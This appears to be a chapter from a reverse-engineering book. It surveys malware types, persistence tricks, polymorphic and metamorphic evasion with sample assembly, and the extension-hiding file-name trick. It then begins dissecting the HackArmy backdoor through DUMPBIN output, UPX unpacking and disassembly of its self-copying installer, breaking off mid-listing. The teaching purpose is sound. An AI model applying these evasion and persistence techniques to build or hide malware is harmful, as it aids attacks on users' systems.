Malicious software (or malware) is any program that works against the interests of the system's user or owner. Generally speaking, computer users expect the computer and all of the software running on it to work on their behalf. Any program that violates this rule is considered malware, because it works in the interest of other people. Sometimes the distinction can get fuzzy. Imagine what happens when a company CEO decides to spy on all company employees. There are numerous programs available that report all kinds of usage statistics and Web-browsing habits. These can be considered malware because they work against the interest of the system's end user and are often extremely difficult to remove.
This chapter introduces the concept of malware and describes the purpose of these programs and how they work. We will be getting into the different types of malware currently in existence, and we'll describe the various techniques they employ in hiding from end users and from antivirus programs.
This topic is related to reversing because reversing is the strongest weapon we, the good people, have against creators of malware. Antivirus researchers routinely engage in reversing sessions in order to analyze the latest malicious programs, determine just how dangerous they are, and learn their weaknesses so that effective antivirus programs can be developed. This chapter opens with a general discussion on some basic malware concepts, and proceeds to demonstrate the malware analysis process on real-world malware.
Malicious code is so prevalent these days that there is widespread confusion regarding the different types of malware currently in existence. The following sections discuss the most popular types of malicious software and explain the differences between them and the dangers associated with them.
Viruses are self-replicating programs that usually have a malicious intent. They are the oldest breed of malware and have become slightly less popular these days, now that there is the Internet. The unique thing about a virus that sets it apart from all other conventional programs is its self-replication. What other program do you know of that actually makes copies of itself whenever it gets the chance? Over the years, there have been many different kinds of viruses, some harmful ones that would delete valuable information or freeze the computer, and others that were harmless and would simply display annoying messages in an attempt to grab the user's attention.
Viruses typically attach themselves to executable program files (such as .exe files on Windows) and slowly duplicate themselves into many executable files on the infected system. As soon as an infected executable is somehow transferred and executed on another machine, that machine becomes infected as well. This means that viruses almost always require some kind of human interaction in order to replicate—they can't just "flow" into the machine next door. Actual viruses are considered pretty rare these days. The Internet is such an attractive replication medium for malicious software that almost every malicious program utilizes it in one way or another. A malicious program that uses the Internet to spread is typically called a worm.
A worm is fundamentally similar to a virus in the sense that it is a self-replicating malicious program. The difference is that a worm self-replicates using a network (such as the Internet), and the replication process doesn't require direct human interaction. It can take place in the background—the user doesn't even have to touch the computer. As you probably imagine, worms have the (well-proven) potential to spread uncontrollably and in remarkably brief periods of time. In a world where almost every computer system is attached to the same network, worms can very easily search for and infect new systems.
Worms can spread using several different techniques. One method by which a modern worm spreads is taking advantage of certain operating system or application program vulnerabilities that allow it to hide in a seemingly innocent data packet. These are the vulnerabilities we discussed in Chapter 7, which can be utilized by attackers in a variety of ways, but they're most commonly used for developing malicious worms. Another common infection method for modern worms is e-mail. Mass mailing worms typically scan the user's contact list and mail themselves to every contact on such a list. It depends on the specific e-mail program, but in most cases the recipient will have to manually open the infected attachment in order for the worm to spread. Not so with vulnerability-based attacks; these rarely require an end-user operation to penetrate a system.
I'm sure you've heard the story about the Trojan horse. The general idea is that a Trojan horse is an innocent artifact openly delivered through the front door when it in fact contains a malicious element hidden somewhere inside of it. In the software world, this translates to seemingly innocent files that actually contain some kind of malicious code underneath. Most Trojans are actually functional programs, so that the user never becomes aware of the problem; the functional element in the program works just fine, while the malicious element works behind the user's back to promote the attacker's interests.
It's really quite easy to go about hiding unwanted functionality inside a useful program. The elegant way is to simply embed a malicious element inside an otherwise benign program. The victim then receives the infected program, launches it, and remains completely oblivious to the fact that the system has been infected. The original application continues to operate normally to eliminate any suspicion.
Another way to implement Trojans that is slightly less elegant (yet quite effective) is by simply fooling users into believing that a file containing a malicious program is really some kind of innocent file, such as a video clip or an image. This is particularly easy under Windows, where file types are determined by their extensions as opposed to actually examining their headers. This means that a remarkably silly trick such as hiding the file's real extension after a couple of hundred spaces actually works. Consider the following file name for example: "A Great Picture.jpg .exe". Depending on the program showing the file name, it might not have room to actually show this whole thing, so it might appear something like "A Great Picture.jpg . . .", essentially hiding the fact that the file is really a program, and not a JPEG picture. One problem with this trick is that Windows will still usually show an application icon, but in some cases Windows will actually show an executable program's icon, if one is available. All one would have to do is simply create an executable that has the default Windows picture icon as its program icon and name it something similar to my example.
A backdoor is a type of malicious software that creates a (usually covert) access channel that the attacker can use for connecting, controlling, spying, or otherwise interacting with the victim's system. Some backdoors come in the form of actual programs that when executed can enable an attacker to remotely connect to the system and use it for a variety of activities. Other backdoors can actually be planted into the program source code right from the beginning by a rogue software developer. If you're thinking that software vendors double-check their source code before the product is shipped, think again. The general rule is that if it works, there's nothing to worry about. Even if the code was manually checked, it is possible to bury a backdoor deep within the source code, in a way that would require an extremely keen eye to notice. It is precisely these types of problems that make open-source software so attractive—these things rarely happen in open-source products.
Mobile code is a class of benign programs that are specifically meant to be mobile and be executed on a large number of systems without being explicitly installed by end users. Most of today's mobile programs are designed to create a more active Web-browsing experience. This includes all kinds of interactive Java applets and ActiveX controls that allow Web sites to embed highly responsive animated content, 3-D presentations, and so on. Depending on the specific platform, these programs essentially enable Web sites to quickly download and launch a program on the end user's system. In most cases (but not all), the user receives a confirmation message saying a program is about to be installed and launched locally. Still, as mentioned earlier, many users seem to "automatically" click the confirmation button, without even considering the possibility that potentially malicious code is about to be downloaded into their system.
The term mobile code only determines how the code is distributed and not the technical details of how it is executed. Certain types of mobile code, such as Java scripts, are distributed in source code form, which makes them far easier to dissect. Others, such as ActiveX components, are conventional PE executables that contain native IA-32 machine code—these are probably the most difficult to analyze. Finally, some mobile code components, such as Java applets, are presented in bytecode form, which makes them highly vulnerable to decompilation and reverse engineering.
This is a relatively new category of malicious programs that has become extremely popular. There are several different types of programs that are part of this category, but probably the most popular ones are the Adware-type programs. Adware is programs that force unsolicited advertising on end users. The idea is that the program gathers various statistics regarding the end user's browsing and shopping habits (sometimes transmitting that data to a centralized server) and uses that information to display targeted ads to the end user. Adware is distributed in many ways, but the primary distribution method is to bundle the adware with free software. The free software is essentially funded by the advertisements displayed by the adware program.
There are several problems with these programs that effectively turn them into a major annoyance that can completely ruin the end-user experience on an infected system. First of all, in some programs the advertisements can appear out of nowhere, regardless of what the end user is doing. This can be highly distracting and annoying. Second, the way in which these programs interface with the operating system and with the Web browser is usually so aggressive and poorly implemented that many of these programs end up reducing the performance and robustness of the system. In Internet Explorer for example, it is not uncommon to see the browser on infected systems freeze for a long time just because a spyware DLL is poorly implemented and doesn't properly use multithreaded code. The interesting thing is that this is not intentional—the adware/spyware developers are simply careless, and they tend to produce buggy code.
Some malicious programs, and especially spyware/adware programs that have a high user visibility invest a lot of energy into preventing users from manually uninstalling them. One simple way to go about doing this is to simply not offer an uninstall program, but that's just the tip of the iceberg. Some programs go to great lengths to ensure that no one, especially no user (as opposed to a program that is specifically crafted for this purpose) can remove them.
Here is an example on how this is possible under Windows. It is possible to install registry keys that instruct Windows to always launch the malware as soon as the system is started. The program can constantly monitor those keys while it is running to make sure those keys are never deleted. If they are, the program can immediately reinstate them. The way to fight this trick from the user's perspective would be to try and terminate the program and then delete the keys. In such case, the malware can use two separate processes, each monitoring the other. When one is terminated, the other immediately launches it again. This makes it quite difficult to get both of them to go away. Because both executables are always running, it becomes very difficult to remove the executable files from the hard drive (because they are locked by the operating system).
Scattering copies of the malware engine throughout various components in the system such as Web browser add-ons, and the like is another approach. Each of these components constantly ensures that none of the others have been removed. If it has been, the damaged component is reinstalled immediately.
Many people have said so the following, and it is becoming quite obvious: Today's malware is just the tip of the iceberg; it could be made far more destructive. In the future, malicious programs could take over computer systems at such low levels that it would be difficult to create any kind of antidote software simply because the malware would own the platform and would be able to control the antivirus program itself. Additionally, the concept of information-stealing worms could some day become a reality, allowing malware developers to steal their victim's valuable information and hold it for ransom!
The following sections discuss some futuristic malware concepts and attempt to assess their destructive potential.
Cryptography is a wonderful thing, but in some cases it can be utilized to perpetrate malicious deeds. Present-day malware doesn't really use cryptography all that much, but this could easily change. Asymmetric encryption creates new possibilities for the creation of information-stealing worms [Young]. These are programs that could potentially spread like any other worm, except that they would locate valuable data on an infected system (such as documents, databases, and so on) and steal it. The actual theft would be performed by encrypting the data using an asymmetric cipher; asymmetric ciphers are encryption algorithms that use a pair of keys. One key (the public key) is used for encrypting the data and another (the private key) is used for decrypting the data. It is not possible to obtain one key from the other.
An information-stealing (or kleptographic) worm could simply embed an encryption key inside its body, and start encrypting every bit of data that appears to be valuable (certain file types that typically contain user data, and so on). By the time the end user realized what had happened, it would already be too late. There could be extremely valuable information sitting on the infected system that's as good as gone. Decryption of the data would not be possible—only the attacker would have the decryption key. This would open the door to a brand-new level of malicious software attacks: attackers could actually blackmail their victims.
Needless to say, actually implementing this idea is quite complicated. Probably the biggest challenge (from an attacker's perspective) would be to demand the ransom and successfully exchange the key for the ransom while maintaining full anonymity. Several theoretical approaches to these problems are discussed in [Young], including zero-knowledge proofs that could be used to allow an attacker to prove that he or she is in possession of the decryption key without actually exposing it.
The basic premise of most malware defense strategies is to leverage the fact that there is always some kind of trusted element in the system. After all, how can an antivirus program detect malicious program if it can't trust the underlying system? For instance, consider an antivirus program that scans the hard drive for infected files and simply uses high-level file-system services in order to read files from the hard drive and determine whether they are infected or not. A clever malicious program could relatively easily install itself as a file-system filter that would intercept the antivirus program's file system calls and present it with fake versions of the files on disk (these would usually be the original, uninfected versions of those files). It would simply hide the fact that it has infected numerous files on the hard drive from the antivirus program!
That is why most security and antivirus programs enter deep into the operating system kernel; they must reside at a low enough level so that malicious programs can't distort their view of the system by implementing file-system filtering or a similar approach.
Here is where things could get nasty. What would happen if a malicious program altered an extremely low-level component? This would be problematic because the antivirus programs would be running on top of this infected component and would have no way of knowing whether they are seeing an authentic picture of the system, or an artificial one painted by a malicious program that doesn't want to be found. Let's take a quick look at how this could be possible.
The lowest level at which a malicious program could theoretically infect a program is the CPU or other hardware devices that use upgradeable firmware. Most modern CPUs actually run a very low-level code that implements each and every supported assembly language instruction using low-level instruction called micro-ops (μ-ops). The μ-op code that runs inside the processor is called firmware, and can usually be updated at the customer site using a special firmware-updating program. This is a sensible design decision since it enables software-level bug fixes that would otherwise require physically replacing the processor. The same goes for many hardware devices such as network and storage adapters. They are often based on programmable microcontrollers that support user-upgradeable firmware.
It is not exactly clear what a malicious program could do at the firmware level, if anything, but the prospects are quite chilling. Malicious firmware would theoretically be included as a part of a larger malicious program and could be used to hide the existence of the malicious program from security and antivirus programs. It would compromise the integrity of the only trustworthy component in a computer system: the hardware. In reality, it would not be easy to implement this kind of attack. The contents of firmware update files made for Intel processors appear to be encrypted (with the decryption key hidden safely inside the processor), and their exact contents are not known. For more information on this topic see Malware: Fighting Malicious Code by Ed Skoudis and Lenny Zeltser [Skoudis].
There are different types of motives that drive people to develop malicious programs. Some developers are interest-driven: The developer actually gains some kind of financial reward by spreading the programs. Others are motivated by certain psychological urges or by childish desires to beat the system. It is hard to classify malware in this way by just looking at what it does. For example, when you run into a malicious program that provides backdoor access to files on infected machines, you might never know whether the program was developed for stealing valuable corporate data or to allow the attacker to peep into some individual's personal files.
Let's take a look at the most typical purposes of malicious programs and try to discover what motivates people to develop them.
Backdoor Access This is a popular end goal for many malicious programs. The attacker gets unlimited access to the infected machine and can use it for a variety of purposes.
Denial-of-Service (DoS) Attacks These attacks are aimed at damaging a public server hosting a Web site or other publicly available resource. The attack is performed by simply programming all infected machines (which can be a huge number of systems) to try to connect to the target resource at the exact same time and simply keep on trying. In many cases, this causes the target server to become unavailable, either due to its Internet connection being saturated, or due to its own resources being exhausted. In these cases, there is typically no direct benefit to the attacker, except perhaps revenge. One direct benefit could occur if the owner of the server under attack were a direct business competitor of the attacker.
Vandalism Sometimes people do things for pure vandalism. An attacker might gain satisfaction and self-importance from deleting a victim's precious files or causing other types of damage. People have a natural urge to make an impact on the world, and unfortunately some people don't care whether it's a negative or a positive impact.
Resource Theft A malicious program can be used to steal other people's computing and networking resources. Once an attacker has a carefully crafted malicious program running on many systems, he or she can start utilizing these systems for extra computing power or extra network bandwidth.
Information Theft Finally, malicious programs can easily be used for information theft. Once a malicious program penetrates into a host, it becomes exceedingly easy to steal files and personal information from that system. If you are wondering where a malicious program would send such valuable information without immediately exposing the attacker, the answer is that it would usually send it to another infected machine, from which the attacker could retrieve it without leaving any trace.
Malware suffers from the same basic problem as copy protection technologies—they run on untrusted platforms and are therefore vulnerable to reversing. The logic and functionality that resides in a malicious program are essentially exposed for all to see. No encryption-based approach can address this problem because it is always going to have to remain possible for the system's CPU to decrypt and access any code or data in the program. Once the code is decrypted, it is going to be possible for malware researchers to analyze its code and behavior—there is no easy way to get around this problem.
There are many ways to hide malicious software, some aimed at hiding it from end users, while others aim at hindering the process of reversing the program so that it survives longer in the wild. Hiding the program can be as simple as naming it in a way that would make end users think it is benign, or even embedding it in some operating system component, so that it becomes completely invisible to the end user.
Once the existence of a malicious program is detected, malware researchers are going to start analyzing and dissecting it. Most of this work revolves around conventional code reversing, but it also frequently relies on system tools such as network- and file-monitoring programs that expose the program's activities without forcing researchers to inspect the code manually. Still, the most powerful analysis method remains code-level analysis, and malware authors sometimes attempt to hinder this process by use of antireversing techniques. These are techniques that attempt to scramble and complicate the code in ways that prolong the analysis process. It is important to keep in mind that most of the techniques in this realm are quite limited and can only strive to complicate the process somewhat, but never to actually prevent it. Chapter 10 discusses these antireversing techniques in detail.
The easiest way for antivirus programs to identify malicious programs is by using unique signatures. The antivirus program maintains a frequently updated database of virus signatures, which aims to contain a unique identification for every known malware program. This identification is based on a unique sequence that was found in a particular strand of the malicious program.
Polymorphism is a technique that thwarts signature-based identification programs by randomly encoding or encrypting the program code in a way that maintains its original functionality. The simplest approach to polymorphism is based on encrypting the program using a random key and decrypting it at runtime. Depending on when an antivirus program scans the program for its signature, this might prevent accurate identification of a malicious program because each copy of it is entirely different (because it is encrypted using a random encryption key).
There are two significant weaknesses with these kinds of solutions. First of all, many antivirus programs might scan for virus signatures in memory. Because in most cases the program is going to be present in memory in its original, unencrypted form, the antivirus program won't have a problem matching the running program with the signature it has on file. The second weakness lies in the decryption code itself. Even if an antivirus program only uses on-disk files in order to match malware signatures, there is still the problem of the decryption code being static. For the program to actually be able to run, it must decrypt itself in memory, and it is this decryption code that could theoretically be used as the signature.
The solution to these problems generally revolves around rotating or scrambling certain elements in the decryption code (or in the entire program) in ways that alter its signature yet preserve its original functionality. Consider the following sequence as an example:
0040343B 8B45 CC MOV EAX,[EBP-34] 0040343E 8B00 MOV EAX,[EAX] 00403440 3345 D8 XOR EAX,[EBP-28] 00403443 8B4D CC MOV ECX,[EBP-34] 00403446 8901 MOV [ECX],EAX 00403448 8B45 D4 MOV EAX,[EBP-2C] 0040344B 8945 D8 MOV [EBP-28],EAX 0040344E 8B45 DC MOV EAX,[EBP-24] 00403451 3345 D4 XOR EAX,[EBP-2C] 00403454 8945 DC MOV [EBP-24],EAX
One almost trivial method that would make it a bit more difficult to identify this sequence would consist of simply randomizing the use of registers in the code. The code sequence uses registers separately at several different phases. Consider, for example, the instructions at 00403448 and 0040344E. Both instructions load a value into EAX, which is used in instructions that follow. It would be quite easy to modify these instructions so that the first uses one register and the second uses another register. It is even quite easy to change the base stack frame pointer (EBP) to use another general-purpose register.
Of course, you could change way more than just registers (see the following section on metamorphism), but by restricting the magnitude of the modification to something like register usage you're enabling the creation of fairly trivial routines that would simply know in advance which bytes should be modified in order to alter register usage—it would all be hard-coded, and the specific registers would be selected randomly at runtime.
0040343B 8B57CC MOV EDX,[EDI-34] 0040343E 8B02MOV EAX,[EDX] 00403440 3347D8 XOR EAX,[EDI-28] 00403443 8B5FCC MOV EBX,[EDI-34] 00403446 8903MOV [EBX],EAX 00403448 8B77D4 MOV ESI,[EDI-2C] 0040344B 8977D8 MOV [EDI-28],ESI 0040344E 8B4FDC MOV ECX,[EDI-24] 00403451 334FD4 XOR ECX,[EDI-2C] 00403454 894FDC MOV [EDI-24],ECX
This code provides an equivalent-functionality alternative to the original sequence. The emphasized bytecodes represent the bytecodes that have changed from the original representation. To simplify the implementation of such transformation, it is feasible to simply store a list of predefined bytes that could be altered and in what way they can be altered. The program could then randomly fiddle with the available combinations during the self-replication process and generate a unique machine code sequence. Because this kind of implementation requires the creation of a table of hard-coded information regarding the specific code bytes that can be altered, this approach would only be feasible when most of the program is encrypted or encoded in some way, as described earlier. It would not be practical to manually scramble an entire program in this fashion. Additionally, it goes without saying that all registers must be saved and restored before entering a function that can be polymorphed in this fashion.
Because polymorphism is limited to very superficial modifications on the malware's decryption code, there are still plenty of ways for antivirus programs to identify polymorphed code by analyzing the code and extracting certain high-level information from it.
This is where metamorphism enters into the picture. Metamorphism is the next logical step after polymorphism. Instead of encrypting the program's body and making slight alterations in the decryption engine, it is possible to alter the entire program each time it is replicated. The benefit of metamorphism (from a malware writer's perspective) is that each version of the malware can look radically different from any other versions. This makes it very difficult (if not impossible) for antivirus writers to use any kind of signature-matching techniques for identifying the malicious program.
Metamorphism requires a powerful code analysis engine that actually needs to be embedded into the malicious program. This engine scans the program code and regenerates a different version of it on the fly every time the program is duplicated. The clever part here is the type of changes made to the program. A metamorphic engine can perform a wide variety of alterations on the malicious program (needless to say, the alterations are performed on the entire malicious program, including the metamorphic engine itself). Let's take a look at some of the alterations that can be automatically applied to a program by a metamorphic engine.
Instruction and Register Selection Metamorphic engines can actually analyze the malicious program in its entirety and regenerate the code for the entire program. While reemitting the code the metamorphic engine can randomize a variety of parameters regarding the code, including the specific selection of instructions (there is usually more than one instruction that can be used for performing any single operation), and the selection of registers.
Instruction Ordering Metamorphic engines can sometimes randomly alter the order of instructions within a function, as long as the instructions in question are independent of one another.
Reversing Conditions In order to seriously alter the malware code, a metamorphic engine can actually reverse some of the conditional statements used in the program. Reversing a condition means (for example) that instead of using a statement that checks whether two operands are equal, you check whether they are unequal (this is routinely done by compilers in the compilation process; see Appendix A). This results in a significant rearrangement of the program's code because it forces the metamorphic engine to relocate conditional blocks within a single function. The idea is that even if the antivirus program employs some kind of high-level scanning of the program in anticipation of a metamorphic engine, it would still have a hard time identifying the program.
Garbage Insertion It is possible to randomly insert garbage instructions that manipulate irrelevant data throughout the program in order to further confuse antivirus scanners. This also adds a certain amount of confusion for human reversers that attempt to analyze the metamorphic program.
Function Order The order in which functions are stored in the module matters very little to the program at runtime, and randomizing it can make the program somewhat more difficult to identify.
To summarize, by combining all of the previously mentioned techniques (and possibly a few others), metamorphic engines can create some truly flexible malware that can be very difficult to locate and identify.
The remainder of this chapter is dedicated to describe a reversing session of an actual malicious program. I've intentionally made the discussion quite detailed, so that readers who aren't properly set up to try this at home won't have to. I would only recommend that you try this out if you can allocate a dedicated machine that is not connected to any network, either local or the Internet. It is also possible to use a virtual machine product such as Microsoft Virtual PC or VMWare Workstation, but you must make sure the virtual machine is completely detached from the host and from the Internet. If your virtual machine is connected to a network, make sure that network is connected to neither the Internet nor the host.
If you need to transfer any executables (such as the malicious program itself) from your primary system into the test system you should use a recordable CD or DVD, just to make sure the malicious program can't replicate itself into that disc and infect other systems. Also, when you store the malicious program on your hard drive or on a recordable CD, it might be wise to rename it with a nonexecutable extension, so that it doesn't get accidentally launched.
The HackArmy backdoor dissected in the following pages can be downloaded at this book's Web site at www.wiley.com/eeilam.
The HackArmy Trojan/Backdoor is the program I've chosen as our malware case study. It is relatively simple malware that is reasonably easy to reverse, and most importantly, it lacks any automated self-replication mechanisms. This is important because it means that there is no risk of this program spreading further because of your attempts to study it. Keep in mind that this is no reason to skimp on the security measures I discussed in the previous section. This is still a malicious program, and as such it should be treated with respect.
The program is essentially a Trojan because it is frequently distributed as an innocent picture file. The file is called a variety of names. My particular copy was named Webcam Shots.scr. The SCR extension is reserved for screen savers, but screensavers are really just regular programs; you could theoretically create a word processor with an .scr extension—it would work just fine. The reason this little trick is effective is that some programs (such as e-mail clients) stupidly give these files a little bitmap icon instead of an application icon, so the user might actually think that they're pictures, when in fact they are programs. One trivial solution is to simply display a special alert that notifies the user when an executable is being downloaded via Web or e-mail. The specific file name that is used for distributing this file really varies. In some e-mail messages (typically sent to news groups) the program is disguised as a picture of soccer star David Beckham, while other messages claim that the file contains proof that Nick Berg, an American civilian who was murdered in Iraq in May of 2004, is still alive. In all messages, the purpose of both the message and the file name is to persuade the unsuspecting user to open the attachment and activate the backdoor.
As with every executable, you begin by dumping the basic headers and imports/export entries in it. You do this by running it through DUMPBIN or a similar program. The output from DUMPBIN is shown in Listing 8.1.
Example 8.1. An abridged DUMPBIN output for the HackArmy backdoor.
Microsoft (R) COFF/PE Dumper Version 7.10.3077
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file Webcam Shots.scr
File Type: EXECUTABLE IMAGE
Section contains the following imports:
KERNEL32.DLL
0 LoadLibraryA
0 GetProcAddress
0 ExitProcess
ADVAPI32.DLL
0 RegCloseKey
CRTDLL.DLL
0 atoi
SHELL32.DLL0 ShellExecuteA
USER32.DLL
0 CharUpperBuffA
WININET.DLL
0 InternetOpenA
WS2_32.DLL
0 bind
Summary
3000 .rsrc
9000 UPX0
2000 UPX1This output exhibits several unusual properties regarding the executable. First of all, there are quite a few DLLs that only have a single import entry—that is highly irregular and really makes no sense. What would the program be able to do with the Winsock 2 binary WS2_32.DLL if it only called the bind API? Not much. The same goes for CRTDLL.DLL, ADVAPI32.DLL, and the rest of the DLLs listed in the import table. The revealing detail here is the Summary section near the end of the listing. One would expect a section called .text that would contain the program code, but there is no such section. Instead there is the traditional .rsrc resource section, and two unrecognized sections called UPX0 and UPX1.
A quick online search reveals that UPX is an open-source executable packer. An executable packer is a program that compresses or encrypts an executable program in place, meaning that the transformation is transparent to the end user—the program is automatically restored to its original state in memory as soon as it is launched. Some packers are designed as antireversing tools that encrypt the program and try to fend off debuggers and disassemblers. Others simply compress the program for the purpose of decreasing the binary file size. UPX belongs to the second group, and is not designed as an antireversing tool, but simply as a compression tool. It makes sense for this type of Trojan/Backdoor to employ UPX in order to keep its file size as small as possible.
You can verify this assumption by downloading the latest beta version of UPX for Windows (note that the Backdoor uses the latest UPX beta, and that the most recent public release at the time of writing, version 1.25, could not identify the file). You can run UPX on the Backdoor executable with the –l switch so that UPX displays compression information for the Backdoor file.
Ultimate Packer for eXecutables
Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004
UPX 1.92 beta Markus F.X.J. Oberhumer & Laszlo Molnar Jul 20th 2004
File size Ratio Format Name
-------------------- ------ ----------- -----------
27680 -> 18976 68.55% win32/pe Webcam Shots.scrAs expected, the Backdoor is packed with UPX, and is actually about 9 KB lighter because of it. Even though UPX is not designed for this, it is going to be slightly annoying to reverse this program in its compressed form, so you can simply avoid this problem by asking UPX to permanently decompress it; you'll reverse the decompressed file. This is done by running UPX again, this time with the –d switch, which replaces the compressed file with a decompressed version that is functionally identical to the compressed version. At this point, it would be wise to rerun DUMPBIN and see if you get a better result this time. Listing 8.2 contains the DUMPBIN output for the decompressed version.
Example 8.2. DUMPBIN output for the decompressed version of the Backdoor program.
Dump of file Webcam Shots.scr
Section contains the following imports:
KERNEL32.DLL
0 DeleteFileA
0 ExitProcess
0 ExpandEnvironmentStringsA
0 FreeLibrary
0 GetCommandLineA
0 GetLastError
0 GetModuleFileNameA
0 GetModuleHandleA
0 GetProcAddress
0 GetSystemDirectoryA
0 CloseHandle
0 GetTempPathA
0 GetTickCount
0 GetVersionExA
0 LoadLibraryA
0 CopyFileA
0 OpenProcess
0 ReleaseMutex
0 RtlUnwind
0 CreateFileA
0 Sleep
0 TerminateProcess
0 TerminateThread0 WriteFile
0 CreateMutexA
0 CreateThread
ADVAPI32.DLL
0 GetUserNameA
0 RegDeleteValueA
0 RegCreateKeyExA
0 RegCloseKey
0 RegQueryValueExA
0 RegSetValueExA
CRTDLL.DLL
0 __GetMainArgs
0 atoi
0 exit
0 free
0 malloc
0 memset
0 printf
0 raise
0 rand
0 signal
0 sprintf
0 srand
0 strcat
0 strchr
0 strcmp
0 strncpy
0 strstr
0 strtok
SHELL32.DLL
0 ShellExecuteA
USER32.DLL
0 CharUpperBuffA
WININET.DLL
0 InternetCloseHandle
0 InternetGetConnectedState
0 InternetOpenA
0 InternetOpenUrlA
0 InternetReadFile
WS2_32.DLL
0 WSACleanup
0 listen
0 ioctlsocket0 inet_addr
0 htons
0 getsockname
0 socket
0 gethostbyname
0 gethostbyaddr
0 connect
0 closesocket
0 bind
0 accept
0 __WSAFDIsSet
0 WSAStartup
0 send
0 select
0 recv
Summary
1000 .bss
1000 .data
1000 .idata
3000 .rsrc
3000 .textThat's more like it, now you can see exactly which functions are used by the program, and reversing it is going to be a more straightforward task. Keep in mind that in some cases automatically unpacking the program is not going to be possible, and we would have to confront the packed program. This subject is discussed in depth in Part III of this book. For now let's start by running the program and trying to determine what it does. Needless to say, this should only be done in a controlled environment, on an isolated system that doesn't contain any valuable data or programs. There's no telling what this program is liable to do.
When launching the Webcam Shots.scr file, the first thing you'll notice is that nothing happens. That's the way it should be—this program does not want to present itself to the end user in any way. It was made to be invisible. If the program's authors wanted the program to be even more convincing and effective, they could have embedded an actual image file into this executable, and immediately extract and show it when the program is first launched. This way the user would never suspect that anything was wrong because the image would be properly displayed. By not doing anything when the user clicks on this file the program might be exposing itself, but then again the typical victims of these kinds of programs are usually nontechnical users that aren't sure exactly what to expect from the computer at any given moment in time. They'd probably think that the reason the image didn't appear was their own fault.
The first actual change that takes place after the program is launched is that the original executable is gone from the directory where it was launched! The task list in Task Manager (or any other process list viewer) seems to contain a new and unidentified process called ZoneLockup.exe. (The machine I was running this on was a freshly installed, clean Windows 2000 system with almost no additional programs installed, so it was easy to detect the newly created process.) The file's name is clearly designed to fool naïve users into thinking that this process is some kind of a security component.
If we launch a more powerful process viewer such as the Sysinternals Process Explorer (available from www.sysinternals.com), you can examine the full path of the ZoneLockup.exe process. It looks like the program has placed itself in the SYSTEM32 directory of the currently running OS (in my case this was C:\WINNT\SYSTEM32).
Let's take a quick look at the code that executes when we initially run this program, because it is the closest thing this program has to an installation program. This code is presented in Listing 8.3.
Example 8.3. The backdoor program's installation function.
00402621 PUSH EBP 00402622 MOV EBP,ESP 00402624 SUB ESP,42C 0040262A PUSH EBX 0040262B PUSH ESI 0040262C PUSH EDI 0040262D XOR ESI,ESI 0040262F PUSH 104 ; BufSize = 104 (260.) 00402634 PUSH ZoneLock.00404540 ; PathBuffer = ZoneLock.00404540 00402639 PUSH 0 ; hModule = NULL 0040263B CALL <JMP.&KERNEL32.GetModuleFileNameA> 00402640 PUSH 104 ; BufSize = 104 (260.) 00402645 PUSH ZoneLock.00404010 ; Buffer = ZoneLock.00404010 0040264A CALL <JMP.&KERNEL32.GetSystemDirectoryA> 0040264F PUSH ZoneLock.00405544 ; src = "\" 00402654 PUSH ZoneLock.00404010 ; dest = "C:\WINNT\system32" 00402659 CALL <JMP.&CRTDLL.strcat> 0040265E ADD ESP,8 00402661 LEA ECX,DWORD PTR DS:[404540] 00402667 OR EAX,FFFFFFFF
0040266A INC EAX 0040266B CMP BYTE PTR DS:[ECX+EAX],0 0040266F JNZ SHORT ZoneLock.0040266A 00402671 MOV EBX,EAX 00402673 PUSH EBX ; Count 00402674 PUSH ZoneLock.00404540 ; String = "C:\WINNT\SYSTEM32\ZoneLockup.exe" 00402679 CALL <JMP.&USER32.CharUpperBuffA> 0040267E LEA ECX,DWORD PTR DS:[404010] 00402684 OR EAX,FFFFFFFF 00402687 INC EAX 00402688 CMP BYTE PTR DS:[ECX+EAX],0 0040268C JNZ SHORT ZoneLock.00402687 0040268E MOV EBX,EAX 00402690 PUSH EBX ; Count 00402691 PUSH ZoneLock.00404010 ; String = "C:\WINNT\system32" 00402696 CALL <JMP.&USER32.CharUpperBuffA> 0040269B PUSH 0 0040269D CALL ZoneLock.004019CB 004026A2 ADD ESP,4 004026A5 PUSH ZoneLock.00404010 ; s2 = "C:\WINNT\system32" 004026AA PUSH ZoneLock.00404540 ; s1 = "C:\WINNT\SYSTEM32\ZoneLockup.exe" 004026AF CALL <JMP.&CRTDLL.strstr> 004026B4 ADD ESP,8 004026B7 CMP EAX,0 004026BA JNZ SHORT ZoneLock.00402736 004026BC PUSH ZoneLock.00405094 ; src = "ZoneLockup.exe" 004026C1 PUSH ZoneLock.00404010 ; dest = "C:\WINNT\system32" 004026C6 CALL <JMP.&CRTDLL.strcat> 004026CB ADD ESP,8 004026CE MOV EDI,0 004026D3 JMP SHORT ZoneLock.004026E0 004026D5 PUSH 1F4 ; Timeout = 500. ms 004026DA CALL <JMP.&KERNEL32.Sleep> 004026DF INC EDI 004026E0 PUSH 0 ; FailIfExists = FALSE 004026E2 PUSH ZoneLock.00404010 ; NewFileName = "C:\WINNT\system32"004026E7 PUSH ZoneLock.00404540 ; ExistingFileName = "C:\WINNT\SYSTEM32\ZoneLockup.exe" 004026EC CALL <JMP.&KERNEL32.CopyFileA> 004026F1 OR EAX,EAX 004026F3 JNZ SHORT ZoneLock.004026FA 004026F5 CMP EDI,5 004026F8 JL SHORT ZoneLock.004026D5 004026FA PUSH ZoneLock.00404540 ; <%s> = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
